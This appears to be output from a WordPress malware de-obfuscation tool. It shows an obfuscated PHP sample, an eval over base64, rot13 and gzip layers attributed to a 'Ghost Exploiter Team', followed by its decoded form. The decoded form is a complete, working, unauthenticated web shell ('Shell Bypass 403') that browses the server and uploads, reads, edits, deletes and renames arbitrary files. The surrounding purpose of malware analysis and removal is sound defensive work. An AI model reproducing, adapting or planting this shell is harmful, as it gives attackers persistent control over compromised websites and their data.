De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php //Encrypted at : http://ghostexploiter.ga/tools/obfusfactor $code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";$ghost = "=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"; eval(gzuncompress(str_rot13(base64_decode($code)))); exit; ?>
<?php //Encrypted at : http://ghostexploiter.ga/tools/obfusfactor $code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy"; $ghost = "=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"; eval { ?><!-- Hak Cipta Ghost Exploiter Team Thanks All Member GhostExploiterTeam --> <?php ?><?php; ?> <!DOCTYPE html> <html> <head> <title>Shell Bypass 403 GE-C666C</title> <link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> </head> <style> * { font-family: cursive; color: #000; font-family: 'Cuprum', sans-serif; } body { background-repeat: no-repeat; background-attachment:fixed; background-size: 100% 1700px; } body h1{ color: #A52A2A; text-shadow: 2px 2px 2px #000; font-size: 50px; } .dir { text-align: center; font-size: 30px; } .dir a{ text-decoration: none; color: #48D1CC; text-shadow: 1px 1px 1px #000; } .dir a:hover{ text-decoration: none; color: red; } table { margin: 12px auto; height: 100%; border-collapse: collapse; font-size: 30px; } table,th { border-top:1px solid #000; border-right:3px solid #000; border-bottom: 3px solid #000; border-left:1px solid #000; box-sizing: border-box; padding: 2px 2px; color: #F0E68C; text-shadow: 1px 1px 1px #000; } table,td { border-top:1px solid #000; border-right:3px solid #000; border-bottom: .5px solid #000; border-left:1px solid #000; box-sizing: border-box; padding: 8px 8px; color: red; } table,td a { text-decoration: none; color:#8A2BE2; text-shadow: 1px 1px 1px #000; } table,td a:hover { text-decoration: none; color: red; } .button1 { width: 70px; height: 30px; background-color: #999; margin: 10px 3px; padding: 5px; color: #000; border-radius: 5px; border: 1px solid #000; box-shadow: .5px .5px .3px .3px #fff; box-sizing: border-box; } .button1 a{ width: 70px; height: 30px; background-color: #999; margin: 10px 3px; padding: 5px; color: red; border-radius: 5px; border: 1px solid #000; box-shadow: .5px .5px .3px .3px #fff; box-sizing: border-box; } .button1:hover { text-shadow: 0px 0px 5px #fff; box-shadow: .5px .5px .3px .3px #555; text-decoration: none; } textarea { border: 1px solid green; border-radius: 5px; box-shadow: 1px 1px 1px 1px #fff; width: 100%; height: 400px; padding-left: 10px; margin: 10px auto; resize: none; background: green; color: #ffffff; font-family: 'Cuprum', sans-serif; font-size: 13px; } </style> <body> <center><h1>Ghost Exploiter Team Official</h1></center> <div class="dir"> <?php if (isset($_GET['dir'])) { $dir = $_GET['dir']; } else { $dir = getcwd(); } $dir = str_replace("\\", "/", $dir); $dirs = explode("/", $dir); foreach ($dirs as $key => $value) { if ($value == "" && $key == 0) { echo '<a href="/">/</a>'; continue; } echo '<a href="?dir='; for ($i = 0; $i <= $key; $i++) { echo "{$dirs[$i]}"; if ($key !== $i) { echo "/"; } } echo '">' . $value . '</a>/'; } if (isset($_POST['submit'])) { $namafile = $_FILES['upload']['name']; $tempatfile = $_FILES['upload']['tmp_name']; $tempat = $_GET['dir']; $error = $_FILES['upload']['error']; $ukuranfile = $_FILES['upload']['size']; move_uploaded_file($tempatfile, $dir . '/' . $namafile); echo "\r\n\t\t\t\t\t<script>alert('diupload!!!');</script>\r\n\t\t\t\t\t"; } ?> <form method="post" enctype="multipart/form-data"> <input type="file" name="upload"> <input type="submit" name="submit" value="Upload"> </form> </div> <table> <tr> <th>Nama File / Folder</th> <th>Size</th> <th>Action</th> </tr> <?php $scan = scandir($dir); foreach ($scan as $directory) { if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') { continue; } echo ' <tr> <td><a href="?dir=' . $dir . '/' . $directory . '">' . $directory . '</a></td> <td>--</td> <td>NONE</td> </tr> '; } foreach ($scan as $file) { if (!is_file($dir . '/' . $file)) { continue; } $jumlah = filesize($dir . '/' . $file) / 1024; $jumlah = round($jumlah, 3); if ($jumlah >= 1024) { $jumlah = round($jumlah / 1024, 2) . 'MB'; } else { $jumlah .= 'KB'; } echo ' <tr> <td><a href="?dir=' . $dir . '&open=' . $dir . '/' . $file . '">' . $file . '</a></td> <td>' . $jumlah . '</td> <td> <a href="?dir=' . $dir . '&delete=' . $dir . '/' . $file . '" class="button1">Hapus</a> <a href="?dir=' . $dir . '&ubah=' . $dir . '/' . $file . '" class="button1">Edit</a> <a href="?dir=' . $dir . '&rename=' . $dir . '/' . $file . '&nama=' . $file . '" class="button1">Rename</a> </td> </tr> '; } if (isset($_GET['open'])) { echo ' <br /> <style> table { display: none; } </style> <textarea>' . htmlspecialchars(file_get_contents($_GET['open'])) . '</textarea> '; } if (isset($_GET['delete'])) { if (unlink($_GET['delete'])) { echo "<script>alert('dihapus');window.location='?dir=" . $dir . "';</script>"; } } if (isset($_GET['ubah'])) { echo ' <style> table { display: none; } </style> <a href="?dir=' . $dir . '" class="button1"><=Back</a> <form method="post" action=""> <input type="hidden" name="object" value="' . $_GET['ubah'] . '"> <textarea name="edit">' . htmlspecialchars(file_get_contents($_GET['ubah'])) . '</textarea> <center><button type="submit" name="go" value="Submit" class="button1">Liking</button></center> </form> '; } if (isset($_POST['edit'])) { $data = fopen($_POST["object"], 'w'); if (fwrite($data, $_POST['edit'])) { echo ' <script>alert("Berhasil diedit!!!");window.location="?dir=' . $dir . '";</script> '; } else { echo "\r\n\t\t\t<script>alert('gagal');</script>\t\t\t\t\t\r\n\t\t\t"; } } if ($_GET['rename']) { if (isset($_POST['newname'])) { if (rename($_GET['rename'], $_GET['dir'] . '/' . $_POST['newname'])) { echo '<font color="green">Ganti Nama Berhasil</font><br/>'; echo "<script>window.location='?dir=" . $dir . "';</script>"; } else { echo '<font color="red">Ganti Nama Gagal</font><br />'; } } echo '<br><center><form method="POST"> New Name : <input name="newname" type="text" size="20" value="' . $_GET['nama'] . '" /> <input type="hidden" name="path" value="' . $_GET['dir'] . '"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form></center>'; } ?> </table> </body> </html><?php }; exit;
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.